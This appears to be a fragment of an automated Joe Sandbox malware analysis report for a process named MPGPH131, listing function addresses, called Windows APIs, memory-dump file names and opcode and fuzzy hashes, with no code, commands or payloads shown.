API String ID: 2104809126-1137672199
Opcode ID: cce1e0cd8d70f7604c34fd6457dd18fc3768f6acdfb67b3253728ac0d2218dac
Instruction ID: 5502d6bb2762a8c14abdb8184a25f6ebedc21314ba75291dcfc37049763cf04f
Opcode Fuzzy Hash: cce1e0cd8d70f7604c34fd6457dd18fc3768f6acdfb67b3253728ac0d2218dac
Instruction Fuzzy Hash: E1518DEB34C125BDB10281426F64EF7676DE6C7B30730C86BF847D6506EB945E8A21B2

Function 04FB0956 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: ac3cb99c1c25c34f180a4f88e2ce3cb03c7810481f7940d7b6456f4d4199ba66
Instruction ID: 34d0c624ac5144e275b27ce51c6971f1d7d9b8fea5e36947f9e40c257822c5b7
Opcode Fuzzy Hash: ac3cb99c1c25c34f180a4f88e2ce3cb03c7810481f7940d7b6456f4d4199ba66
Instruction Fuzzy Hash: 84519EEB34C125BDB50281426F64EF7676DE6C7B30730C86BF887D6506EB941E8A21B1

Function 04FB09C5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: f4b2ac4bf61ff6ed9ef1f37d1a0f6e0615e0a402b121ad6af93c8140a79e9ffa
Instruction ID: 18ca0377ecb66ae9c9ff483222355850514b7d369014164fb23d26fa68acdaae
Opcode Fuzzy Hash: f4b2ac4bf61ff6ed9ef1f37d1a0f6e0615e0a402b121ad6af93c8140a79e9ffa
Instruction Fuzzy Hash: 8441BFEB34C1257DB10291866F64EF7676DE6C7B30330C86BF887D6506EA841E4B21B1

Function 04FB09AC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: cc0442a4bb8cef9e8c43a2beded40ec2c357d3b1d7735b0a6c0aa0a89d717094
Instruction ID: 2f9c8fa866eeabd106aab222541317c5d0ab0982b03fd98c686b576b9648534f
Opcode Fuzzy Hash: cc0442a4bb8cef9e8c43a2beded40ec2c357d3b1d7735b0a6c0aa0a89d717094
Instruction Fuzzy Hash: E241B0EB34C211BDB20281866F54EF7676DE7C7B30730C86BF487D6506EA941E4A21B1

Function 04FB0A20 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: 15ad104bcc1192f99f71a029841b06042c54f73e8f4d3612d94b80b058d09775
Instruction ID: 3741eff29ea083e9de337f884022e111c5c04f32a96efc956fb0314cc7668962
Opcode Fuzzy Hash: 15ad104bcc1192f99f71a029841b06042c54f73e8f4d3612d94b80b058d09775
Instruction Fuzzy Hash: 2A41DFEB34C165BDB50281926F64EF7676DE7C7B30330C86BF483D6506EA841A8B61B1

Function 04FB09D9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: 1252261ede54bf865003fe5c68742ba1e3075dc0decfeb3c9b214434a9f84649
Instruction ID: 4d34759c70ebc66ac76c482b8a3a46b5e48f869b404e6eda738c6ab71b00e69b
Opcode Fuzzy Hash: 1252261ede54bf865003fe5c68742ba1e3075dc0decfeb3c9b214434a9f84649
Instruction Fuzzy Hash: 0241AFEB34C1217DB10291826F54EF7676DE6C7B30330C86BF847D6506EA941E4A21B1

Function 04FB0A09 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: 6a7269ded5aceaadbfb0823be25c111b5245b656438941f4c99e523237a109c7
Instruction ID: f30ceea9eca53901193f52f4dd3e265c7995455c951153fda4c03570c201903a
Opcode Fuzzy Hash: 6a7269ded5aceaadbfb0823be25c111b5245b656438941f4c99e523237a109c7
Instruction Fuzzy Hash: B341BEEB34C211BDB10291826F54EF7676DE7C7B30730C86BF483D6506FA841A4A21B1

Function 00BA21BC Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00B95DA7,?,00000000,00000000,00000000,?,00000000,?,00B8B2D2,00B95DA7,00000000,00B8B2D2,?,?), ref: 00BA2341

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6fc7e7908de09dabe606cdde77601756e169ed4890d95618fee47bee930dd994
Instruction ID: 26ca05f0ad1c005d9d0e1c6779ddad7ea970ce5c88fdcf34972302ad3d801a49
Opcode Fuzzy Hash: 6fc7e7908de09dabe606cdde77601756e169ed4890d95618fee47bee930dd994
Instruction Fuzzy Hash: E061BE71808259AEDF15CFACC880AEEBBF9EF0B304F1405D5E900AB216D776D9018BA4

Function 00B1ACB0 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B1AE01

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction ID: 39eb036681f86293bb6c5fd4e4a559f652a5300d4aef237bdd20c7516cc80769
Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction Fuzzy Hash: 1E41D372A011049BCB15EF68DD806AEBBE5EF45311B6402B9F814EB251D730EE51DBD2

Function 00BA1832 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00BA1719,00000000,CF830579,00BDFCB8,0000000C,00BA17D5,00B958DD,?), ref: 00BA1888

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 47fdf6f4b6689c07a701d83b27040ffed2d9a1dd863b3459cea21e60abba066f
Instruction ID: 5c8f3e957d56eecdc0dc14e697ea31cb54f8385fba86b973c0f14788c0937cc2
Opcode Fuzzy Hash: 47fdf6f4b6689c07a701d83b27040ffed2d9a1dd863b3459cea21e60abba066f
Instruction Fuzzy Hash: 6D116B3365C12029D765227C6C41B7E2BC9CF83778F3909D9F8159B1D2EF6C9C424145

Function 00B9AD7C Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00BDF970,00B8B2D2,00000002,00B8B2D2,00000000,?,?,?,00B9AE86,00000000,?,00B8B2D2,00000002,00BDF970), ref: 00B9ADB8

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4c00860e8b98588e0f13013f2fd76d8469bddd8269656a84424b1e2a386c8dec
Instruction ID: e515bfda042a4174f7b5d6d3bde6b4babb439f86940143180807e4bb05d2d113
Opcode Fuzzy Hash: 4c00860e8b98588e0f13013f2fd76d8469bddd8269656a84424b1e2a386c8dec
Instruction Fuzzy Hash: A5012632624159AFCF058F59CC45C9E3BA9DF81330F3502A8F8019B2A0EA71ED4187D0

Function 00B8BFB1 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB1FDE

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
Instruction ID: 085eb2663a62a95208150d570014491e8bcc18c5cf6109b73a553c9e1f129c28
Opcode Fuzzy Hash: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
Instruction Fuzzy Hash: D001FE3640420D77CB14FBB4EC01D99B7ECDE11360B5085B6FA149A5A1FBB0E590C7D5

Function 00BA3113 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00B8A41C,?,?,00BA2A99,00000001,00000364,?,00000006,000000FF,?,00B8D39B,?,?,?,?), ref: 00BA3155

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
Instruction ID: 3c0eec96febdbc4c2cf5f99440b824d33a1ec3e58f4ab83a55781115bece6f33
Opcode Fuzzy Hash: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
Instruction Fuzzy Hash: 14F0E93160D728669B616B6A8C41B5B77C9DF43FB0F1580E1BC18BA180CB30EA4041E0

Function 00BA3B4D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B8D39B,?,?,?,?,?,00AB2D8D,00B8A41C,?,?,00B8A41C), ref: 00BA3B80

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
Instruction ID: f14498b95850780c8b055871d4e44cf7fdb5e6b03e24c9fa8a5a95d9e3e4cf4d
Opcode Fuzzy Hash: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
Instruction Fuzzy Hash: 06E0ED3150D320A6EA2036298C80B6B66CBCB87BB0F9506E4BC189A181DB60CE0081B1

Function 04FC00BD Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5802822ff56d149ca89517ae2cce6ae367cfe2435b7c855b27bc72fd4fd7f584
Instruction ID: cdd75d9def859f9bbb70aad20eb3f3f358d54fae399e9825da3f75f5a6079c08
Opcode Fuzzy Hash: 5802822ff56d149ca89517ae2cce6ae367cfe2435b7c855b27bc72fd4fd7f584
Instruction Fuzzy Hash: 8B218FA7A8D282EED7024DE04B517F6BF69BB93634722417FF04389143FA45560B93A1

Function 04FC0000 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a3dedb122b122c1492a97f93fc6b4d7d78416153a6a7372ec52555f0e6a3c3b
Instruction ID: d9b46f8d37d6747ca1ed9fe09c61bbb34c9b28e39497fcbefe21501c28a8f602
Opcode Fuzzy Hash: 4a3dedb122b122c1492a97f93fc6b4d7d78416153a6a7372ec52555f0e6a3c3b
Instruction Fuzzy Hash: A8119DAB38C057FDA10259C11B149FAAA2EE7D3374331803EF80796542FA955B0B7570

Function 04FC0007 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed757c4e03e24916d9ef42266309225285773789fc2f6aef51e3477d4b68f16
Instruction ID: 15b8e06c22aa8e79eef6d4fd4666172aa3ceb0302b812cbf2d87dd345ef3740c
Opcode Fuzzy Hash: 0ed757c4e03e24916d9ef42266309225285773789fc2f6aef51e3477d4b68f16
Instruction Fuzzy Hash: BA11D09F38C056FDA10259D11B499F6AB2EE6D3370331843EF4079A542FA945A0B7571

Function 04FC0040 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412c70bfd0103ed8ecabcf93402c6e356fcb7aaab90a94f5109159eeba2b3158
Instruction ID: 183cf3f1790cb5a65816c49eb60adf70b77d3ca3ea7c3706cafec445008dd09e
Opcode Fuzzy Hash: 412c70bfd0103ed8ecabcf93402c6e356fcb7aaab90a94f5109159eeba2b3158
Instruction Fuzzy Hash: 4601CCAB38C057FE950219C25B499FABB2EE7D2370331803EF40785502FA856B0BB5B1

Function 04FC004D Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6d7fba41ce0dac47bf35a156a0917559f23d26c6829d1c3d3f64ade7d12d2cc
Instruction ID: bd21b1ad565c78c8e280d4850f0357006dc305094d55b633ffd5d1fee44cb9d7
Opcode Fuzzy Hash: f6d7fba41ce0dac47bf35a156a0917559f23d26c6829d1c3d3f64ade7d12d2cc
Instruction Fuzzy Hash: 2601C0AB388052FE95020DD15B549FABB2EE7D2334331843EF443C5502FE956A0BA6B0

Function 04FC0060 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f054e574cd395840f2374e9fccb4796b98cef43491a66cd0e75a81ad9845cdb
Instruction ID: 35ec1ed401fb923a29ee65cd94d702f6fa80b699618ee137def22547c0bc07ba
Opcode Fuzzy Hash: 7f054e574cd395840f2374e9fccb4796b98cef43491a66cd0e75a81ad9845cdb
Instruction Fuzzy Hash: 4801B1AB388152FE96024DD15B449FABF6EFBD2330371803EF44785602FA956B0BA561

Function 04FC0084 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4135590108.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fc0000_MPGPH131.jbxd

Similarity

API ID:
String ID:
API String ID:
